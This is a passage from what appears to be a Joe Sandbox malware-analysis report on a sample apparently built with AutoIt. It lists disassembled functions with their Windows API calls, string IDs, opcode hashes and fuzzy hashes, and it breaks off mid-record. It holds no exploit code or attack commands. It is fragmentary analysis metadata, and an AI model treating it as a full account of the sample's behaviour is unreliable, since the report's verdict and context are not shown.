                                                                                • Opcode Fuzzy Hash: 31bc9587b0f8738a1a2a9b548f177e6e17cf9a6d95afa651500949e716fbfc28
                                                                                • Instruction Fuzzy Hash: 5831AD31210606AFDF219E38DC46BEA7BAAEB49334F204315F975922E0DB70EC519B50
                                                                                APIs
                                                                                • SysReAllocString.OLEAUT32(?,?), ref: 00636EED
                                                                                • VariantCopyInd.OLEAUT32(?,?), ref: 00636F08
                                                                                • VariantClear.OLEAUT32(?), ref: 00636F12
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$AllocClearCopyString
                                                                                • String ID: *jc
                                                                                • API String ID: 2173805711-2167581163
                                                                                • Opcode ID: b08feb1c77388872e553a28fe962dce4019719eefc4e4c5b32dbdb182f9ab259
                                                                                • Instruction ID: 3d08214f1d402fddd94579194d56eb1b796409a3bfc9ef8b57998f04b9b54f51
                                                                                • Opcode Fuzzy Hash: b08feb1c77388872e553a28fe962dce4019719eefc4e4c5b32dbdb182f9ab259
                                                                                • Instruction Fuzzy Hash: 1C316B71604256EBCB14AF69E8549BD3BB7BF84300F10449AF8064B3B1DB309912DBE4
                                                                                APIs
                                                                                  • Part of subcall function 0065335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00653077,?,?), ref: 00653378
                                                                                • inet_addr.WSOCK32(?), ref: 0065307A
                                                                                • _wcslen.LIBCMT ref: 0065309B
                                                                                • htons.WSOCK32(00000000), ref: 00653106
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                • String ID: 255.255.255.255
                                                                                • API String ID: 946324512-2422070025
                                                                                • Opcode ID: 034fba77fc26f1ad7d27b49d345bed7b276775a97960245f769bdcb8a13a7f1a
                                                                                • Instruction ID: e08e358eaf7582bd8daa9a9b63662d11a046acada5e116fb98c005932119ea48
                                                                                • Opcode Fuzzy Hash: 034fba77fc26f1ad7d27b49d345bed7b276775a97960245f769bdcb8a13a7f1a
                                                                                • Instruction Fuzzy Hash: A331D5352003169FCB20CF28C585EAA7BE2EF55799F248059ED158B392D771DE49C760
                                                                                APIs
                                                                                • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00664705
                                                                                • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00664713
                                                                                • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0066471A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$DestroyWindow
                                                                                • String ID: msctls_updown32
                                                                                • API String ID: 4014797782-2298589950
                                                                                • Opcode ID: 95983865a3651246773ed67ba2315ac4b58e88ebb822482c2701c2fc09a7ef1f
                                                                                • Instruction ID: ac189be1f2de8611236c43111f3b2e1e63d0f38909651b5e1578e7408773a84a
                                                                                • Opcode Fuzzy Hash: 95983865a3651246773ed67ba2315ac4b58e88ebb822482c2701c2fc09a7ef1f
                                                                                • Instruction Fuzzy Hash: B22131B5600209AFDB10DF64DC95DB73BAEEB5B3A4B040159F6009B351DB71EC51CA60
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: _wcslen
                                                                                • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                • API String ID: 176396367-2734436370
                                                                                • Opcode ID: fe3fd3f1ef3f2d2bfa32a625a5dfbd30d7c9043aba69e7bd1017ce0f35537315
                                                                                • Instruction ID: bcbe3b0203dd5f10092c0caf51a2f40ab16a11ff7e0956836be968a842012c62
                                                                                • Opcode Fuzzy Hash: fe3fd3f1ef3f2d2bfa32a625a5dfbd30d7c9043aba69e7bd1017ce0f35537315
                                                                                • Instruction Fuzzy Hash: 61218E3210461566D331AB289C07FF777DEEF95310F004026FA4997242EBD59D81CAF1
                                                                                APIs
                                                                                • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00663840
                                                                                • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00663850
                                                                                • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00663876
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$MoveWindow
                                                                                • String ID: Listbox
                                                                                • API String ID: 3315199576-2633736733
                                                                                • Opcode ID: 923be3badf113f537f33bba79ac63243e8c75acdecf2c8c6fc833e39561c51af
                                                                                • Instruction ID: f5fa7221b60bf3bfab919aa228370797f753c148b708f3990df146e805d978ea
                                                                                • Opcode Fuzzy Hash: 923be3badf113f537f33bba79ac63243e8c75acdecf2c8c6fc833e39561c51af
                                                                                • Instruction Fuzzy Hash: EC21B072610228BBEF219F54CC45EFB3B6FEF89760F108118F9009B290C6B1EC5287A0
                                                                                APIs
                                                                                • SetErrorMode.KERNEL32(00000001), ref: 00644A08
                                                                                • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00644A5C
                                                                                • SetErrorMode.KERNEL32(00000000,?,?,0066CC08), ref: 00644AD0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorMode$InformationVolume
                                                                                • String ID: %lu
                                                                                • API String ID: 2507767853-685833217
                                                                                • Opcode ID: f4e82aafa17f6a49a92310c8eba3e0c9c8220ad2bc33d308f52b973a9cfefcf9
                                                                                • Instruction ID: db0309c6a12a295d1786e3ff7bebab404594a2b6ceca3562a71d4eb4200e2f0b
                                                                                • Opcode Fuzzy Hash: f4e82aafa17f6a49a92310c8eba3e0c9c8220ad2bc33d308f52b973a9cfefcf9
                                                                                • Instruction Fuzzy Hash: 9E317371A00109AFDB10DF54C885EAA7BF9EF49314F148099F905DB362DB71ED45CB61
                                                                                APIs
                                                                                • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0066424F
                                                                                • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00664264
                                                                                • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00664271
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID: msctls_trackbar32
                                                                                • API String ID: 3850602802-1010561917
                                                                                • Opcode ID: bbb37590366e489cd710bcc70b8547aaa968c2618bd778b9d536122686db6a88
                                                                                • Instruction ID: bb510d9014428bcd25e55fbbb31afb5edd482da30db4252ec4dee303c9b022e0
                                                                                • Opcode Fuzzy Hash: bbb37590366e489cd710bcc70b8547aaa968c2618bd778b9d536122686db6a88
                                                                                • Instruction Fuzzy Hash: 9811E331240208BEEF205F28CC46FEB7BAEEF86B64F110114FA55E6190D6B1D8519B14
                                                                                APIs
                                                                                  • Part of subcall function 005D6B57: _wcslen.LIBCMT ref: 005D6B6A
                                                                                  • Part of subcall function 00632DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00632DC5
                                                                                  • Part of subcall function 00632DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00632DD6
                                                                                  • Part of subcall function 00632DA7: GetCurrentThreadId.KERNEL32 ref: 00632DDD
                                                                                  • Part of subcall function 00632DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00632DE4
                                                                                • GetFocus.USER32 ref: 00632F78
                                                                                  • Part of subcall function 00632DEE: GetParent.USER32(00000000), ref: 00632DF9
                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 00632FC3
                                                                                • EnumChildWindows.USER32(?,0063303B), ref: 00632FEB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                • String ID: %s%d
                                                                                • API String ID: 1272988791-1110647743
                                                                                • Opcode ID: 93be9bd2a0d3dee65eed0409c1e9b33c61455bbe2c30f1d445b3f4c7186d8d7e
                                                                                • Instruction ID: 237c6cd422f88425945eed17331324ee0575ac389b48a711a3a9e2df1e4e7e8f
                                                                                • Opcode Fuzzy Hash: 93be9bd2a0d3dee65eed0409c1e9b33c61455bbe2c30f1d445b3f4c7186d8d7e
                                                                                • Instruction Fuzzy Hash: 6011D271600206ABDF547F64CC99EED376BAF84314F04507AF909DB292DF7099068BB0
                                                                                APIs
                                                                                • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 006658C1
                                                                                • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 006658EE
                                                                                • DrawMenuBar.USER32(?), ref: 006658FD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$InfoItem$Draw
                                                                                • String ID: 0
                                                                                • API String ID: 3227129158-4108050209
                                                                                • Opcode ID: f438441966314b2bf9d1c97f2c967330bbb72501d5b595d623d23cf64d2b4f49
                                                                                • Instruction ID: 48b12d0bf5354f7b2638765953d9a493941084192d57da6539fe2c530d0847dd
                                                                                • Opcode Fuzzy Hash: f438441966314b2bf9d1c97f2c967330bbb72501d5b595d623d23cf64d2b4f49
                                                                                • Instruction Fuzzy Hash: 6701A131500248EFDB109F11DC45BAEBBBAFB45360F00809AE88AD6251DF309A90DF30
                                                                                APIs
                                                                                • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 0062D3BF
                                                                                • FreeLibrary.KERNEL32 ref: 0062D3E5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: AddressFreeLibraryProc
                                                                                • String ID: GetSystemWow64DirectoryW$X64
                                                                                • API String ID: 3013587201-2590602151
                                                                                • Opcode ID: 8ed14fad56e7569e07a669eedde9537001c6bffb3c9f7808b6fcd85a6789a1ff
                                                                                • Instruction ID: 90ac8aefb888c372905e91e8bc56e22f2c319d1a92334f33c867cbb6ef1164eb
                                                                                • Opcode Fuzzy Hash: 8ed14fad56e7569e07a669eedde9537001c6bffb3c9f7808b6fcd85a6789a1ff
                                                                                • Instruction Fuzzy Hash: A7F05532802E30DBD7319A10EC18AF97B27AF13701B68C415E982E6244EB60CE408ED2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c3690f45a3f6a59bf97c0e98726a24066bd76bd81c7ee0f069cc946462c26248
                                                                                • Instruction ID: eb165dee108bf5066740417c521e670546ccfb6c87d190b71e07bd4363d00bd6
                                                                                • Opcode Fuzzy Hash: c3690f45a3f6a59bf97c0e98726a24066bd76bd81c7ee0f069cc946462c26248
                                                                                • Instruction Fuzzy Hash: 03C14D75A00216EFEB14CFA4C8A4EAEB7B6FF48714F208598E505EB251D731DE45CB90
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$ClearInitInitializeUninitialize
                                                                                • String ID:
                                                                                • API String ID: 1998397398-0
                                                                                • Opcode ID: ca95c2045ebe5f69f205799b0a6ca6e00f51bf54906ae473b27b9067f1a826e1
                                                                                • Instruction ID: e92017805ed9d8c95a0508d5e4beec968854c37b25e3e28478ed0389c5a24d3a
                                                                                • Opcode Fuzzy Hash: ca95c2045ebe5f69f205799b0a6ca6e00f51bf54906ae473b27b9067f1a826e1
                                                                                • Instruction Fuzzy Hash: 6AA14A756042119FC710DF28C485A2ABBE6FF88755F04895EFD899B362EB30ED05CB92
                                                                                APIs
                                                                                • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,0066FC08,?), ref: 006305F0
                                                                                • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,0066FC08,?), ref: 00630608
                                                                                • CLSIDFromProgID.OLE32(?,?,00000000,0066CC40,000000FF,?,00000000,00000800,00000000,?,0066FC08,?), ref: 0063062D
                                                                                • _memcmp.LIBVCRUNTIME ref: 0063064E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: FromProg$FreeTask_memcmp
                                                                                • String ID:
                                                                                • API String ID: 314563124-0
                                                                                • Opcode ID: 29da5f275ec782b3942f526b75ba2ba0502b521b9f113fb0f4084e1357412620
                                                                                • Instruction ID: 022304b2366de04fdb78115ccfb1923c76fb43b36981ded7a877c7ecce3916b4
                                                                                • Opcode Fuzzy Hash: 29da5f275ec782b3942f526b75ba2ba0502b521b9f113fb0f4084e1357412620
                                                                                • Instruction Fuzzy Hash: AD811071A00109EFDB04DF94C994DEEB7BAFF89315F104599E506AB250DB71AE0ACBA0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: _free
                                                                                • String ID:
                                                                                • API String ID: 269201875-0
                                                                                • Opcode ID: 56e32ca72041bf1a35c9b414ac46a6943609a09458e511141cbc2143c946579a
                                                                                • Instruction ID: c65f95dbaf4077fc7383e84239e33073caad7411ac835d12dd06832732c1dfbc
                                                                                • Opcode Fuzzy Hash: 56e32ca72041bf1a35c9b414ac46a6943609a09458e511141cbc2143c946579a
                                                                                • Instruction Fuzzy Hash: 9C414935600505ABDB256FB98C496FF3EE7FF43B70F1C4229F619DA292E63448815362
                                                                                APIs
                                                                                • GetWindowRect.USER32(01A3E418,?), ref: 006662E2
                                                                                • ScreenToClient.USER32(?,?), ref: 00666315
                                                                                • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00666382
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ClientMoveRectScreen
                                                                                • String ID:
                                                                                • API String ID: 3880355969-0
                                                                                • Opcode ID: 4a04a9633751a2808054807c2b607d15d3f0fb15fe51f7561e8e1c4a89bca591
                                                                                • Instruction ID: 1826d1b682411900899bd9151f786c0615b5b549c1f7895bdb83e438c34c2673
                                                                                • Opcode Fuzzy Hash: 4a04a9633751a2808054807c2b607d15d3f0fb15fe51f7561e8e1c4a89bca591
                                                                                • Instruction Fuzzy Hash: 37510A74A00249EFDB10DF58E8809AE7BB6EF85364F10915AF855AB390D770AD81CB90
                                                                                APIs
                                                                                • socket.WSOCK32(00000002,00000002,00000011), ref: 00651AFD (AF_INET, SOCK_DGRAM, IPPROTO_UDP: a UDP socket)
                                                                                • WSAGetLastError.WSOCK32 ref: 00651B0B
                                                                                • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00651B8A (wsock32 ordinal 21 is setsockopt; 0000FFFF/00000020 read as SOL_SOCKET/SO_BROADCAST with a 4-byte option value)
                                                                                • WSAGetLastError.WSOCK32 ref: 00651B94
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$socket
                                                                                • String ID:
                                                                                • API String ID: 1881357543-0
                                                                                • Opcode ID: f1466b7206b6622a4986f5650e5f1993f3d41bd276f9b8634466d4d7f9fb6e0b
                                                                                • Instruction ID: 114d8bc8e2fabb3a630027303e99995466d1ac18fbcd46d041bd609849a5be39
                                                                                • Opcode Fuzzy Hash: f1466b7206b6622a4986f5650e5f1993f3d41bd276f9b8634466d4d7f9fb6e0b
                                                                                • Instruction Fuzzy Hash: 9641A434600201AFE720AF24C88AF657BE6EB85718F548459F95A9F3D3D7B2DD42CB90
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 869e4901fa37922f656839ccfdd99ea7944430044095a67eb27cf15532d509ff
                                                                                • Instruction ID: 520088067bd3ca8d513427bae123c4d6dbaea9097a50466834509d82c2204d66
                                                                                • Opcode Fuzzy Hash: 869e4901fa37922f656839ccfdd99ea7944430044095a67eb27cf15532d509ff
                                                                                • Instruction Fuzzy Hash: E7412875A40304AFD7299F78CC45BABBBEAEF88710F10856EF141DB6D1D3719A418780
                                                                                APIs
                                                                                • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00645783
                                                                                • GetLastError.KERNEL32(?,00000000), ref: 006457A9
